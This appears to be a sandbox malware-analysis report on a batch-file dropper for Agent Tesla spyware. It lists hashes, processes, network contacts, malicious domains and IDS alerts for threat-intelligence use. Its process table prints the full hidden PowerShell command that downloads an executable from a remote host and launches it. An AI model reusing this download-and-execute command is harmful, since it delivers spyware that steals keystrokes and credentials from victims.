File name: | Transfer_Copy_swift.Bat |
Full analysis: | https://app.any.run/tasks/c2395a90-533e-44a8-81ea-2263a557bd35 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | September 11, 2019, 10:07:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with no line terminators |
MD5: | 978E538418885D334CA95972D8A5C0F1 |
SHA1: | B3ECB9667C4596897BC607811FAFB88F8CC5F670 |
SHA256: | 9568CAFC7552691DC7732A17F6D1AE067D6BBB014357798ECFB71284A07BE0E8 |
SSDEEP: | 6:nGQO08ZCaxyvtx0zV7OnnVKgR/FQAmdtoIMFCz2:nGQp8Yaxy1I7OnVK+/6joIM4y |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3512 | cmd /c ""C:\Users\admin\Desktop\Transfer_Copy_swift.Bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2340 | PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://web.riderit.com:8000/ajp/public/5a2eec141864de49a45bb29ac52dbe6b.php','C:\Users\admin\AppData\Local\Temp\Test.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\Test.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3148 | "C:\Users\admin\AppData\Local\Temp\Test.exe" | C:\Users\admin\AppData\Local\Temp\Test.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM Description: Version: 0.0.0.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2340 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1CEAZ5HOECD0SMCZFXY2.temp | — | |
MD5:— | SHA256:— | |||
2340 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169a9f.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2340 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Test.exe | executable | |
MD5:131C2C561ED08BE561321F706140BD43 | SHA256:33D2EE7D7EF16344682B121CEE3FB189DBDCC070AB7552B150360E418D700A4C | |||
2340 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
3148 | Test.exe | C:\Users\admin\AppData\Local\Temp\637037968909062500_81b1d37c-7b5c-4a73-a9d9-f4400fa3fe34.db | sqlite | |
MD5:0B3C43342CE2A99318AA0FE9E531C57B | SHA256:0CCB4915E00390685621DA3D75EBFD5EDADC94155A79C66415A7F4E9763D71B8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2340 | powershell.exe | GET | 200 | 1.217.125.148:8000 | http://web.riderit.com:8000/ajp/public/5a2eec141864de49a45bb29ac52dbe6b.php | KR | executable | 333 Kb | malicious |
3148 | Test.exe | GET | 200 | 18.214.132.216:80 | http://checkip.amazonaws.com/ | US | text | 14 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2340 | powershell.exe | 1.217.125.148:8000 | web.riderit.com | LG DACOM Corporation | KR | malicious |
3148 | Test.exe | 18.214.132.216:80 | checkip.amazonaws.com | — | US | shared |
3148 | Test.exe | 216.55.169.138:587 | mail.trezaexim.com | Codero | US | malicious |
Domain | IP | Reputation |
---|---|---|
web.riderit.com |
| malicious |
checkip.amazonaws.com |
| shared |
mail.trezaexim.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2340 | powershell.exe | A Network Trojan was detected | AV TROJAN TrojanDownloader.Agent Second Stage Download |
2340 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2340 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2340 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3148 | Test.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla IP Check |
3148 | Test.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |